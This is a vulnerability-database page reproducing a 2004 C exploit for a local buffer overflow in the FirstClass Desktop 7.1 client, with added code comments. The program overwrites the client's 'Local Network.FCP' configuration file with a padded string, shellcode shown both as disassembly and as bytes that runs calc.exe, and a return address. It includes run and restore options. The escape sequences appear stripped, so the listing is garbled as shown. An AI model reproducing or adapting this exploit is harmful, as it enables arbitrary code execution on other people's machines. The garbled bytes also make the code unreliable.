FirstClass Desktop 7.1 – Local Buffer Overflow
漏洞ID | 1054440 | 漏洞类型 | |
发布时间 | 2004-04-07 | 更新时间 | 2004-04-07 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/***********************************************************
++++++++++++++++++++++++++++++++++++++++++++++++++++
####################################################
# FirstClass Desktop 7.1 (latest) buffer overflow exploit #
####################################################
Discovered and coded by I2S-LaB.
URL : http://www.I2S-LaB.com
contact : contact[at]I2S-LaB.com
++++++++++++++++++++++++++++++++++++++++++++++++++++
Compile it with cl.exe (VC++6)
***********************************************************/
#include <windows.h>
/*
 * Entry point (non-standard `void main`; VC++6 accepted it).
 *
 * Rewrites the FirstClass client configuration file "Local Network.FCP"
 * (FC_FILE) in the directory named by PATH, or in the directory passed as
 * argv[2], with the bytes of rawData. The client's later handling of that
 * file is presumed to be where the overflow occurs (inferred from the
 * comments inside rawData; the parsing code itself is not on this page).
 *
 *   argv[1]  "/run" or "/restore", compared case-insensitively with
 *            lstrcmpi; anything else, or no argument, prints the usage.
 *   argv[2]  optional directory holding FC_FILE; defaults to PATH.
 *
 * Defender's view: the program needs write access to the FirstClass
 * install directory, touches exactly two files there (FC_FILE and
 * "Local Network.BAK"), and the original content is recoverable only
 * through that .BAK copy. File-integrity monitoring of FC_FILE and a
 * write ACL on the Fcp directory that excludes ordinary users both limit
 * the local impact.
 *
 * NOTE(review): the escape sequences in every string literal below look
 * stripped by the page's extraction (e.g. a bare `n` where a line break
 * was meant), so the listing is not compilable as shown; treat the byte
 * values as an approximate record. printf/strlen are also used without
 * <stdio.h>/<string.h>, which windows.h does not declare.
 */
void main (int argc, char *argv[])
{
HANDLE FCP;                      /* config file handle; never closed with CloseHandle (see below) */
DWORD NumberOfBytesWritten;      /* filled by WriteFile, never compared with the requested length */
unsigned char *p,                /* directory to switch into: argv[2] if given, else PATH */
FC_FILE[] = "Local Network.FCP",
PATH[] = "C:\Program Files\FirstClass\Fcp\",
rawData[] =                      /* file content written verbatim (plus its terminating NUL) */
/////////////////////////////////////////////////////////////////
// FC file data
/////////////////////////////////////////////////////////////////
"x43x4Fx4Ex4Ex54x59x50x45x20x3Dx20x38x0Dx0Ax46x43"
"x50x45x4Ex43x52x59x50x54x20x3Dx20x31x0Dx0Ax44x4C"
"x53x45x4Ex44x20x3Dx20x30x0Dx0Ax44x4Cx45x52x52x53"
"x20x3Dx20x30x0Dx0Ax44x4Cx52x43x56x20x3Dx20x30x0D"
"x0Ax4Dx44x4Dx44x42x47x20x3Dx20x30x0Dx0Ax53x4Cx44"
"x42x47x20x3Dx20x30x0Dx0Ax54x43x50x54x58x57x49x4E"
"x20x3Dx20x31x30x30x30x30x0Dx0Ax54x43x50x52x58x42"
"x55x46x20x3Dx20x31x30x30x30x30x0Dx0Ax54x43x50x52"
"x45x4Dx50x4Fx52x54x20x3Dx20x35x31x30x0Dx0Ax50x52"
"x4Fx58x59x50x4Fx52x54x20x3Dx20x22"
/////////////////////////////////////////////////////////////////
// MASS NOP LIKE : 'A' = inc ecx
/////////////////////////////////////////////////////////////////
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
/*
* Fcclient Specific shellcode [78 bytes]
*****************************************************************
:00401006 EB47 jmp 0040104F
:00401008 5A pop edx
:00401009 33FF xor edi, edi
:0040100B 8BEC mov ebp, esp
:0040100D 57 push edi
:0040100E 52 push edx
:0040100F 57 push edi
:00401010 6845786563 push 63657845
:00401015 4F dec edi
:00401016 81EFFFA89691 sub edi, 9196A8FF
:0040101C 57 push edi
:0040101D 68454C3332 push 32334C45
:00401022 684B45524E push 4E52454B
:00401027 8D5DE4 lea ebx, dword ptr [ebp-1C]
:0040102A 53 push ebx
:0040102B 33FF xor edi, edi
:0040102D 81EF589D9DFF sub edi, FF9D9D58
:00401033 FF17 call dword ptr [edi]
:00401035 8D5DED lea ebx, dword ptr [ebp-13]
:00401038 53 push ebx
:00401039 50 push eax
:0040103A 6681F75103 xor di, 0351
:0040103F 4F dec edi
:00401040 FF17 call dword ptr [edi]
:00401042 6A01 push 00000001
:00401044 FF75F8 push [ebp-08]
:00401047 FFD0 call eax
:00401049 6683EF4C sub di, 004C
:0040104D FFD7 call edi
:0040104F E8B4FFFFFF call 00401008
**********************************************************
*
*/
"xEBx47x5Ax33xFFx8BxECx57x52x57x68x45x78x65x63x4F"
"x81xEFxFFxA8x96x91x57x68x45x4Cx33x32x68x4Bx45x52"
"x4Ex8Dx5DxE4x53x33xFFx81xEFx58x9Dx9DxFFxFFx17x8D"
"x5DxEDx53x50x66x81xF7x51x03x4FxFFx17x6Ax01xFFx75"
"xF8xFFxD0x66x83xEFx4CxFFxD7xE8xB4xFFxFFxFF"
"calc.exe & " // to execute
////////////////////////////////////////////////////////////////
// OTHER DATA
////////////////////////////////////////////////////////////////
"x22x0Ax0Dx0Ax50x52x4Fx58x59x41x44x44x52x20"
"x3Dx20x22x41x41x41x41x41x41x41x41x41x41x45x45x45"
"x45x44x44"
/////////////////////////////////////////////////////////////////
// Return Address
/////////////////////////////////////////////////////////////////
"x5fx75xC2x00";
// Banner
printf ("###############################################n"
"FirstClass Client local buffer overflow Exploitn"
"###############################################n"
"Discovered & coded by I2S-LaB.nn"
"URL : http://www.I2S-LaB.comn"
"MAIL : Contact[at]I2S-LaB.comnn");
/* With no arguments argv[1] is NULL (argv[argc] is NULL per the C standard).
 * Substituting FC_FILE makes both command comparisons below fail, so the
 * usage text is printed. Assigning unsigned char[] to char * only warns in VC6. */
if ( !argv[1]) argv[1] = FC_FILE;
/* Conditional expression used as a statement: p = argv[2] when a third
 * argument exists, otherwise the built-in PATH. */
(argc > 2 ) ? (p = argv[2]) : (p = PATH);
/* Every file operation below is relative to this directory. Note the exit
 * code is 0 on failure, so a scripted caller cannot tell it from success. */
if ( !(SetCurrentDirectory( p ) ) )
{
printf ("cannot set current directory to %snexiting.n", p);
ExitProcess(0);
}
/* /restore: copy the .BAK back over FC_FILE. bFailIfExists = FALSE, so the
 * current FC_FILE is overwritten. The "not found" message is printed for
 * any CopyFile failure; GetLastError is not consulted. */
if (!lstrcmpi (argv[1], "/restore") )
printf ("Restore the backup file...%sn",
CopyFile ("Local Network.BAK", FC_FILE, FALSE) ? "ok" : "Error : backup file not found!n");
else if ( !lstrcmpi (argv[1], "/run"))
{
/* bFailIfExists = TRUE keeps an existing .BAK from an earlier run, which
 * preserves the original content across re-runs. A failed backup does NOT
 * abort, however: the overwrite below proceeds regardless, so if the copy
 * fails for any other reason the original file is lost. */
printf ("Saving the Local Network file...%sn",
CopyFile (FC_FILE, "Local Network.BAK", TRUE) ? "ok" : "Backup file cannot be made");
printf ("Opening the Local Network file...");
/* OPEN_EXISTING without TRUNCATE_EXISTING: the file is not truncated. If the
 * existing file is longer than the data written, its tail survives after
 * the written bytes. The handle is opened with FILE_SHARE_WRITE. */
FCP = CreateFile (FC_FILE, GENERIC_WRITE,
FILE_SHARE_WRITE, NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,NULL);
if (FCP == INVALID_HANDLE_VALUE)
{
printf ("cannot open Local Network file, exiting!n");
ExitProcess (-1);                /* UINT parameter: exit code 0xFFFFFFFF */
}
/* Writes strlen(rawData) + 1 bytes, i.e. including the string's terminating
 * NUL. NumberOfBytesWritten is never compared with that length, so a short
 * write is reported as "ok". FCP is never closed; the process exit releases it. */
printf ("oknWriting the Local Network File...%sn",
WriteFile (FCP, rawData, strlen (rawData) + 1, &NumberOfBytesWritten, NULL) ? "ok" : "Write file error!");
}
/* Any other argument (or none, see above) prints the usage. */
else printf ("usage : %s /RUN | /RESTORE [path to Local Network.FCP]nn"
"/RUN : launch the xploit against "Local Network.FCP"n"
"/RESTORE : Restore the previous "Local Network.FCP"nn"
"[path to Local Network.FCP] : Optional,ndefine the path of the "Local Network.FCP" to exploit.n"
"Default is %sn", argv[0], PATH);
}
// milw0rm.com [2004-04-07]